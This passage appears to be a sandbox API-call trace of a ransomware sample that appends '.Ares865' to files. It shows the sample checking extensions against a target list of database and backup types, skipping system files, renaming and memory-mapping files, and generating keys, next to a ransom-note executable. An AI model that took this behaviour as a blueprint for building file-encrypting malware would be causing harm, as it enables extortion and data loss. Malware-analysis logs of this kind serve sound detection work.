(lpString="^^^") returned 3 [0089.571] lstrcmpiW (lpString1="png", lpString2="^^^") returned 1 [0089.571] lstrlenW (lpString="abs") returned 3 [0089.571] lstrcmpiW (lpString1="png", lpString2="abs") returned 1 [0089.571] lstrlenW (lpString="abx") returned 3 [0089.571] lstrcmpiW (lpString1="png", lpString2="abx") returned 1 [0089.571] lstrlenW (lpString="accdb") returned 5 [0089.571] lstrcmpiW (lpString1="e.png", lpString2="accdb") returned 1 [0089.571] lstrlenW (lpString="accdc") returned 5 [0089.571] lstrcmpiW (lpString1="e.png", lpString2="accdc") returned 1 [0089.571] lstrlenW (lpString="accde") returned 5 [0089.571] lstrcmpiW (lpString1="e.png", lpString2="accde") returned 1 [0089.571] lstrlenW (lpString="accdr") returned 5 [0089.571] lstrcmpiW (lpString1="e.png", lpString2="accdr") returned 1 [0089.571] lstrlenW (lpString="accdt") returned 5 [0089.571] lstrcmpiW (lpString1="e.png", lpString2="accdt") returned 1 [0089.571] lstrlenW (lpString="accdw") returned 5 [0089.571] lstrcmpiW (lpString1="e.png", lpString2="accdw") returned 1 [0089.571] lstrlenW (lpString="accft") returned 5 [0089.571] lstrcmpiW (lpString1="e.png", lpString2="accft") returned 1 [0089.571] lstrlenW (lpString="adb") returned 3 [0089.571] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0089.571] lstrlenW (lpString="adb") returned 3 [0089.571] lstrcmpiW (lpString1="png", lpString2="adb") returned 1 [0089.571] lstrlenW (lpString="ade") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="ade") returned 1 [0089.572] lstrlenW (lpString="adf") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="adf") returned 1 [0089.572] lstrlenW (lpString="adn") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="adn") returned 1 [0089.572] lstrlenW (lpString="adp") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="adp") returned 1 [0089.572] lstrlenW (lpString="alf") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="alf") returned 1 [0089.572] lstrlenW (lpString="ask") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="ask") returned 1 [0089.572] lstrlenW (lpString="btr") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="btr") returned 1 [0089.572] lstrlenW (lpString="cat") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="cat") returned 1 [0089.572] lstrlenW (lpString="cdb") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="cdb") returned 1 [0089.572] lstrlenW (lpString="ckp") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="ckp") returned 1 [0089.572] lstrlenW (lpString="cma") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="cma") returned 1 [0089.572] lstrlenW (lpString="cpd") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="cpd") returned 1 [0089.572] lstrlenW (lpString="dacpac") returned 6 [0089.572] lstrcmpiW (lpString1="ce.png", lpString2="dacpac") returned -1 [0089.572] lstrlenW (lpString="dad") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="dad") returned 1 [0089.572] lstrlenW (lpString="dadiagrams") returned 10 [0089.572] lstrlenW (lpString="daschema") returned 8 [0089.572] lstrcmpiW (lpString1="vice.png", lpString2="daschema") returned 1 [0089.572] lstrlenW (lpString="db-journal") returned 10 [0089.572] lstrlenW (lpString="db-shm") returned 6 [0089.572] lstrcmpiW (lpString1="ce.png", lpString2="db-shm") returned -1 [0089.572] lstrlenW (lpString="db-wal") returned 6 [0089.572] lstrcmpiW (lpString1="ce.png", lpString2="db-wal") returned -1 [0089.572] lstrlenW (lpString="dbc") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="dbc") returned 1 [0089.572] lstrlenW (lpString="dbs") returned 3 [0089.572] lstrcmpiW (lpString1="png", lpString2="dbs") returned 1 [0089.573] lstrlenW (lpString="dbt") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="dbt") returned 1 [0089.573] lstrlenW (lpString="dbv") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="dbv") returned 1 [0089.573] lstrlenW (lpString="dbx") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="dbx") returned 1 [0089.573] lstrlenW (lpString="dcb") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="dcb") returned 1 [0089.573] lstrlenW (lpString="dct") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="dct") returned 1 [0089.573] lstrlenW (lpString="dcx") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="dcx") returned 1 [0089.573] lstrlenW (lpString="ddl") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="ddl") returned 1 [0089.573] lstrlenW (lpString="dlis") returned 4 [0089.573] lstrcmpiW (lpString1=".png", lpString2="dlis") returned -1 [0089.573] lstrlenW (lpString="dp1") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="dp1") returned 1 [0089.573] lstrlenW (lpString="dqy") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="dqy") returned 1 [0089.573] lstrlenW (lpString="dsk") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="dsk") returned 1 [0089.573] lstrlenW (lpString="dsn") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="dsn") returned 1 [0089.573] lstrlenW (lpString="dtsx") returned 4 [0089.573] lstrcmpiW (lpString1=".png", lpString2="dtsx") returned -1 [0089.573] lstrlenW (lpString="dxl") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="dxl") returned 1 [0089.573] lstrlenW (lpString="eco") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="eco") returned 1 [0089.573] lstrlenW (lpString="ecx") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="ecx") returned 1 [0089.573] lstrlenW (lpString="edb") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="edb") returned 1 [0089.573] lstrlenW (lpString="epim") returned 4 [0089.573] lstrcmpiW (lpString1=".png", lpString2="epim") returned -1 [0089.573] lstrlenW (lpString="fcd") returned 3 [0089.573] lstrcmpiW (lpString1="png", lpString2="fcd") returned 1 [0089.573] lstrlenW (lpString="fdb") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="fdb") returned 1 [0089.574] lstrlenW (lpString="fic") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="fic") returned 1 [0089.574] lstrlenW (lpString="flexolibrary") returned 12 [0089.574] lstrlenW (lpString="fm5") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="fm5") returned 1 [0089.574] lstrlenW (lpString="fmp") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="fmp") returned 1 [0089.574] lstrlenW (lpString="fmp12") returned 5 [0089.574] lstrcmpiW (lpString1="e.png", lpString2="fmp12") returned -1 [0089.574] lstrlenW (lpString="fmpsl") returned 5 [0089.574] lstrcmpiW (lpString1="e.png", lpString2="fmpsl") returned -1 [0089.574] lstrlenW (lpString="fol") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="fol") returned 1 [0089.574] lstrlenW (lpString="fp3") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="fp3") returned 1 [0089.574] lstrlenW (lpString="fp4") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="fp4") returned 1 [0089.574] lstrlenW (lpString="fp5") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="fp5") returned 1 [0089.574] lstrlenW (lpString="fp7") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="fp7") returned 1 [0089.574] lstrlenW (lpString="fpt") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="fpt") returned 1 [0089.574] lstrlenW (lpString="frm") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="frm") returned 1 [0089.574] lstrlenW (lpString="gdb") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0089.574] lstrlenW (lpString="gdb") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="gdb") returned 1 [0089.574] lstrlenW (lpString="grdb") returned 4 [0089.574] lstrcmpiW (lpString1=".png", lpString2="grdb") returned -1 [0089.574] lstrlenW (lpString="gwi") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="gwi") returned 1 [0089.574] lstrlenW (lpString="hdb") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="hdb") returned 1 [0089.574] lstrlenW (lpString="his") returned 3 [0089.574] lstrcmpiW (lpString1="png", lpString2="his") returned 1 [0089.574] lstrlenW (lpString="ib") returned 2 [0089.575] lstrcmpiW (lpString1="ng", lpString2="ib") returned 1 [0089.575] lstrlenW (lpString="idb") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="idb") returned 1 [0089.575] lstrlenW (lpString="ihx") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="ihx") returned 1 [0089.575] lstrlenW (lpString="itdb") returned 4 [0089.575] lstrcmpiW (lpString1=".png", lpString2="itdb") returned -1 [0089.575] lstrlenW (lpString="itw") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="itw") returned 1 [0089.575] lstrlenW (lpString="jet") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="jet") returned 1 [0089.575] lstrlenW (lpString="jtx") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="jtx") returned 1 [0089.575] lstrlenW (lpString="kdb") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="kdb") returned 1 [0089.575] lstrlenW (lpString="kexi") returned 4 [0089.575] lstrcmpiW (lpString1=".png", lpString2="kexi") returned -1 [0089.575] lstrlenW (lpString="kexic") returned 5 [0089.575] lstrcmpiW (lpString1="e.png", lpString2="kexic") returned -1 [0089.575] lstrlenW (lpString="kexis") returned 5 [0089.575] lstrcmpiW (lpString1="e.png", lpString2="kexis") returned -1 [0089.575] lstrlenW (lpString="lgc") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="lgc") returned 1 [0089.575] lstrlenW (lpString="lwx") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="lwx") returned 1 [0089.575] lstrlenW (lpString="maf") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="maf") returned 1 [0089.575] lstrlenW (lpString="maq") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="maq") returned 1 [0089.575] lstrlenW (lpString="mar") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="mar") returned 1 [0089.575] lstrlenW (lpString="marshal") returned 7 [0089.575] lstrcmpiW (lpString1="ice.png", lpString2="marshal") returned -1 [0089.575] lstrlenW (lpString="mas") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="mas") returned 1 [0089.575] lstrlenW (lpString="mav") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="mav") returned 1 [0089.575] lstrlenW (lpString="maw") returned 3 [0089.575] lstrcmpiW (lpString1="png", lpString2="maw") returned 1 [0089.575] lstrlenW (lpString="mdbhtml") returned 7 [0089.576] lstrcmpiW (lpString1="ice.png", lpString2="mdbhtml") returned -1 [0089.576] lstrlenW (lpString="mdn") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="mdn") returned 1 [0089.576] lstrlenW (lpString="mdt") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="mdt") returned 1 [0089.576] lstrlenW (lpString="mfd") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="mfd") returned 1 [0089.576] lstrlenW (lpString="mpd") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="mpd") returned 1 [0089.576] lstrlenW (lpString="mrg") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="mrg") returned 1 [0089.576] lstrlenW (lpString="mud") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="mud") returned 1 [0089.576] lstrlenW (lpString="mwb") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="mwb") returned 1 [0089.576] lstrlenW (lpString="myd") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="myd") returned 1 [0089.576] lstrlenW (lpString="ndf") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="ndf") returned 1 [0089.576] lstrlenW (lpString="nnt") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="nnt") returned 1 [0089.576] lstrlenW (lpString="nrmlib") returned 6 [0089.576] lstrcmpiW (lpString1="ce.png", lpString2="nrmlib") returned -1 [0089.576] lstrlenW (lpString="ns2") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="ns2") returned 1 [0089.576] lstrlenW (lpString="ns3") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="ns3") returned 1 [0089.576] lstrlenW (lpString="ns4") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="ns4") returned 1 [0089.576] lstrlenW (lpString="nsf") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="nsf") returned 1 [0089.576] lstrlenW (lpString="nv") returned 2 [0089.576] lstrcmpiW (lpString1="ng", lpString2="nv") returned -1 [0089.576] lstrlenW (lpString="nv2") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="nv2") returned 1 [0089.576] lstrlenW (lpString="nwdb") returned 4 [0089.576] lstrcmpiW (lpString1=".png", lpString2="nwdb") returned -1 [0089.576] lstrlenW (lpString="nyf") returned 3 [0089.576] lstrcmpiW (lpString1="png", lpString2="nyf") returned 1 [0089.577] lstrlenW (lpString="odb") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0089.577] lstrlenW (lpString="odb") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="odb") returned 1 [0089.577] lstrlenW (lpString="oqy") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="oqy") returned 1 [0089.577] lstrlenW (lpString="ora") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="ora") returned 1 [0089.577] lstrlenW (lpString="orx") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="orx") returned 1 [0089.577] lstrlenW (lpString="owc") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="owc") returned 1 [0089.577] lstrlenW (lpString="p96") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="p96") returned 1 [0089.577] lstrlenW (lpString="p97") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="p97") returned 1 [0089.577] lstrlenW (lpString="pan") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="pan") returned 1 [0089.577] lstrlenW (lpString="pdb") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="pdb") returned 1 [0089.577] lstrlenW (lpString="pdm") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="pdm") returned 1 [0089.577] lstrlenW (lpString="pnz") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="pnz") returned -1 [0089.577] lstrlenW (lpString="qry") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="qry") returned -1 [0089.577] lstrlenW (lpString="qvd") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="qvd") returned -1 [0089.577] lstrlenW (lpString="rbf") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="rbf") returned -1 [0089.577] lstrlenW (lpString="rctd") returned 4 [0089.577] lstrcmpiW (lpString1=".png", lpString2="rctd") returned -1 [0089.577] lstrlenW (lpString="rod") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="rod") returned -1 [0089.577] lstrlenW (lpString="rodx") returned 4 [0089.577] lstrcmpiW (lpString1=".png", lpString2="rodx") returned -1 [0089.577] lstrlenW (lpString="rpd") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="rpd") returned -1 [0089.577] lstrlenW (lpString="rsd") returned 3 [0089.577] lstrcmpiW (lpString1="png", lpString2="rsd") returned -1 [0089.578] lstrlenW (lpString="sas7bdat") returned 8 [0089.578] lstrcmpiW (lpString1="vice.png", lpString2="sas7bdat") returned 1 [0089.578] lstrlenW (lpString="sbf") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="sbf") returned -1 [0089.578] lstrlenW (lpString="scx") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="scx") returned -1 [0089.578] lstrlenW (lpString="sdb") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="sdb") returned -1 [0089.578] lstrlenW (lpString="sdc") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="sdc") returned -1 [0089.578] lstrlenW (lpString="sdf") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="sdf") returned -1 [0089.578] lstrlenW (lpString="sis") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="sis") returned -1 [0089.578] lstrlenW (lpString="spq") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="spq") returned -1 [0089.578] lstrlenW (lpString="te") returned 2 [0089.578] lstrcmpiW (lpString1="ng", lpString2="te") returned -1 [0089.578] lstrlenW (lpString="teacher") returned 7 [0089.578] lstrcmpiW (lpString1="ice.png", lpString2="teacher") returned -1 [0089.578] lstrlenW (lpString="tmd") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="tmd") returned -1 [0089.578] lstrlenW (lpString="tps") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="tps") returned -1 [0089.578] lstrlenW (lpString="trc") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0089.578] lstrlenW (lpString="trc") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="trc") returned -1 [0089.578] lstrlenW (lpString="trm") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="trm") returned -1 [0089.578] lstrlenW (lpString="udb") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="udb") returned -1 [0089.578] lstrlenW (lpString="udl") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="udl") returned -1 [0089.578] lstrlenW (lpString="usr") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="usr") returned -1 [0089.578] lstrlenW (lpString="v12") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="v12") returned -1 [0089.578] lstrlenW (lpString="vis") returned 3 [0089.578] lstrcmpiW (lpString1="png", lpString2="vis") returned -1 [0089.579] lstrlenW (lpString="vpd") returned 3 [0089.579] lstrcmpiW (lpString1="png", lpString2="vpd") returned -1 [0089.579] lstrlenW (lpString="vvv") returned 3 [0089.579] lstrcmpiW (lpString1="png", lpString2="vvv") returned -1 [0089.579] lstrlenW (lpString="wdb") returned 3 [0089.579] lstrcmpiW (lpString1="png", lpString2="wdb") returned -1 [0089.579] lstrlenW (lpString="wmdb") returned 4 [0089.579] lstrcmpiW (lpString1=".png", lpString2="wmdb") returned -1 [0089.579] lstrlenW (lpString="wrk") returned 3 [0089.579] lstrcmpiW (lpString1="png", lpString2="wrk") returned -1 [0089.579] lstrlenW (lpString="xdb") returned 3 [0089.579] lstrcmpiW (lpString1="png", lpString2="xdb") returned -1 [0089.579] lstrlenW (lpString="xld") returned 3 [0089.579] lstrcmpiW (lpString1="png", lpString2="xld") returned -1 [0089.579] lstrlenW (lpString="xmlff") returned 5 [0089.579] lstrcmpiW (lpString1="e.png", lpString2="xmlff") returned -1 [0089.579] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.Ares865") returned 106 [0089.579] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.ares865"), dwFlags=0x1) returned 1 [0089.580] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.580] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=44488) returned 1 [0089.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.580] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.580] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.581] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.581] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.581] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb0d0, lpName=0x0) returned 0x15c [0089.583] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb0d0) returned 0x190000 [0089.586] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.586] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.587] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.587] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.587] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.587] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.588] CloseHandle (hObject=0x15c) returned 1 [0089.588] CloseHandle (hObject=0x118) returned 1 [0089.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.588] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.588] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c84ada0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c84ada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.588] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.588] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0a07cc, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0a07cc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="overlay.png", cAlternateFileName="")) returned 1 [0089.588] lstrcmpiW (lpString1="overlay.png", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.588] lstrcmpiW (lpString1="overlay.png", lpString2="aoldtz.exe") returned 1 [0089.588] lstrcmpiW (lpString1="overlay.png", lpString2=".") returned 1 [0089.588] lstrcmpiW (lpString1="overlay.png", lpString2="..") returned 1 [0089.588] lstrcmpiW (lpString1="overlay.png", lpString2="windows") returned -1 [0089.588] lstrcmpiW (lpString1="overlay.png", lpString2="bootmgr") returned 1 [0089.588] lstrcmpiW (lpString1="overlay.png", lpString2="temp") returned -1 [0089.588] lstrcmpiW (lpString1="overlay.png", lpString2="pagefile.sys") returned -1 [0089.588] lstrcmpiW (lpString1="overlay.png", lpString2="boot") returned 1 [0089.588] lstrcmpiW (lpString1="overlay.png", lpString2="ids.txt") returned 1 [0089.588] lstrcmpiW (lpString1="overlay.png", lpString2="ntuser.dat") returned 1 [0089.588] lstrcmpiW (lpString1="overlay.png", lpString2="perflogs") returned -1 [0089.588] lstrcmpiW (lpString1="overlay.png", lpString2="MSBuild") returned 1 [0089.589] lstrlenW (lpString="overlay.png") returned 11 [0089.589] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 98 [0089.589] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="overlay.png" | out: lpString1="overlay.png") returned="overlay.png" [0089.589] lstrlenW (lpString="overlay.png") returned 11 [0089.589] lstrlenW (lpString="Ares865") returned 7 [0089.589] lstrcmpiW (lpString1="lay.png", lpString2="Ares865") returned 1 [0089.589] lstrlenW (lpString=".dll") returned 4 [0089.589] lstrcmpiW (lpString1="overlay.png", lpString2=".dll") returned 1 [0089.589] lstrlenW (lpString=".lnk") returned 4 [0089.589] lstrcmpiW (lpString1="overlay.png", lpString2=".lnk") returned 1 [0089.589] lstrlenW (lpString=".ini") returned 4 [0089.589] lstrcmpiW (lpString1="overlay.png", lpString2=".ini") returned 1 [0089.589] lstrlenW (lpString=".sys") returned 4 [0089.589] lstrcmpiW (lpString1="overlay.png", lpString2=".sys") returned 1 [0089.589] lstrlenW (lpString="overlay.png") returned 11 [0089.589] lstrlenW (lpString="bak") returned 3 [0089.589] lstrcmpiW (lpString1="png", lpString2="bak") returned 1 [0089.589] lstrlenW (lpString="ba_") returned 3 [0089.589] lstrcmpiW (lpString1="png", lpString2="ba_") returned 1 [0089.589] lstrlenW (lpString="dbb") returned 3 [0089.589] lstrcmpiW (lpString1="png", lpString2="dbb") returned 1 [0089.589] lstrlenW (lpString="vmdk") returned 4 [0089.589] lstrcmpiW (lpString1=".png", lpString2="vmdk") returned -1 [0089.589] lstrlenW (lpString="rar") returned 3 [0089.589] lstrcmpiW (lpString1="png", lpString2="rar") returned -1 [0089.589] lstrlenW (lpString="zip") returned 3 [0089.589] lstrcmpiW (lpString1="png", lpString2="zip") returned -1 [0089.589] lstrlenW (lpString="tgz") returned 3 [0089.589] lstrcmpiW (lpString1="png", lpString2="tgz") returned -1 [0089.589] lstrlenW (lpString="vbox") returned 4 [0089.589] lstrcmpiW (lpString1=".png", lpString2="vbox") returned -1 [0089.589] lstrlenW (lpString="vdi") returned 3 [0089.589] lstrcmpiW (lpString1="png", lpString2="vdi") returned -1 [0089.589] lstrlenW (lpString="vhd") returned 3 [0089.589] lstrcmpiW (lpString1="png", lpString2="vhd") returned -1 [0089.589] lstrlenW (lpString="vhdx") returned 4 [0089.589] lstrcmpiW (lpString1=".png", lpString2="vhdx") returned -1 [0089.589] lstrlenW (lpString="avhd") returned 4 [0089.590] lstrcmpiW (lpString1=".png", lpString2="avhd") returned -1 [0089.590] lstrlenW (lpString="db") returned 2 [0089.590] lstrcmpiW (lpString1="ng", lpString2="db") returned 1 [0089.590] lstrlenW (lpString="db2") returned 3 [0089.590] lstrcmpiW (lpString1="png", lpString2="db2") returned 1 [0089.590] 